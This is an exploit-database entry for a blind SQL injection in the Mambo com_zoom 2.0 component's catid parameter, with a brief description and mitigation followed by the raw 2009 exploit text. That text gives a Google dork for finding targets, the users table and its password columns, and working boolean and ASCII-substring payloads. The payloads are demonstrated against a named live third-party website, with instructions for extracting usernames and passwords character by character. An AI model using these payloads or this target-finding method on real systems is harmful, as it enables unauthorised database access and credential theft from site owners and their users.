Mambo component com_zoom (catid) Blind SQL injection

vendor:

zoom

by:

boom3rang

7,5

CVSS

HIGH

Blind SQL injection

CWE

Product Name: zoom

Affected Version From: 2.0

Affected Version To: 2.0

Patch Exists: NO

Related CWE: N/A

CPE: a:mikedeboer:zoom

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Mambo component com_zoom (catid) Blind SQL injection

Mambo component com_zoom is vulnerable to Blind SQL injection. An attacker can exploit this vulnerability to gain access to sensitive information such as usernames and passwords stored in the database. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'catid' parameter of the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. A successful exploitation of this vulnerability can result in unauthorized access to sensitive information stored in the database.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized. Additionally, the application should be configured to use the least privileged user account with the least amount of privileges.

Source

Exploit-DB raw data:

  Mambo component com_zoom (catid) Blind SQL injection                                       [_][-][X] 
      _  ___  _  ___      ___ ___ _____      __  ___ __   __  ___        
     | |/ / || |/ __|___ / __| _ \ __\ \    / / |_  )  \ /  \/ _ \       
     | ' <| __ | (_ |___| (__|   / _| \ \/\/ /   / / () | () \_, /       
     |_|\_\_||_|\___|    \___|_|_\___| \_/\_/   /___\__/ \__/ /_/        
                                                                           
                                                                         
      Red n'black i dress eagle on my chest. 
      It's good to be an ALBANIAN Keep my head up high for that flag i die. 
      Im proud to be an ALBANIAN
   ###################################################################    
    								          
       Author         	: boom3rang		 	                  
       Contact        	: boom3rang[at]live.com                          
       Greetz   	: H!tm@N - KHG - cHs

		  R.I.P redc00de		          
   -------------------------------------------------------------------    
    								          
                  Affected software description    	                  
             <name>zoom</name>
             <creationDate>20/01/2004</creationDate>
             <author>Mike de Boer</author>
             <authorEmail>mailme@mikedeboer.nl</authorEmail>
             <authorUrl>www.mikedeboer.nl</authorUrl>
             <version>2.0</version>			          
   -------------------------------------------------------------------    
    								          
    [~] SQLi :						                  
    								          
    http://www.TARGET.com/index.php?option=com_zoom&Itemid=0&catid=[SQLi]           
                                                                 
    [~]Google Dork :		   				                  
    
    inurl:com_zoom inurl:"imgid"						    
    						          
   -------------------------------------------------------------------    
    								          
    [~] Table_NAME  =  mos_users
    [~] Column_NAME =  username - password 			                  								          
   -------------------------------------------------------------------    
    								          
    [~] Admin Path :					                  
    								          
    http://www.TARGET.com/administrator

   ===================================================================	
	                          = POC =
   ===================================================================    

        
    [~] Live Demo:
    ttp://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/1=1/*    --> True
   ttp://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/1=2/*    --> False

   -------------------------------------------------------------------

    [~] ASCII 
   index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>96

   -------------------------------------------------------------------
    
    [~] Live Demo ASCII

      True
   http://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>96		
      
      False
   http://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>97

   Like we see, the first charter of username is 'a'	char(97)=a
   Now you can change the second limit to find other charters, Good Luck...	

note:
<name>zoom</name>
<creationDate>20/01/2004</creationDate>
<author>Mike de Boer</author>
<authorEmail>mailme@mikedeboer.nl</authorEmail>
<authorUrl>www.mikedeboer.nl</authorUrl>
<version>2.0</version>

# milw0rm.com [2009-09-04]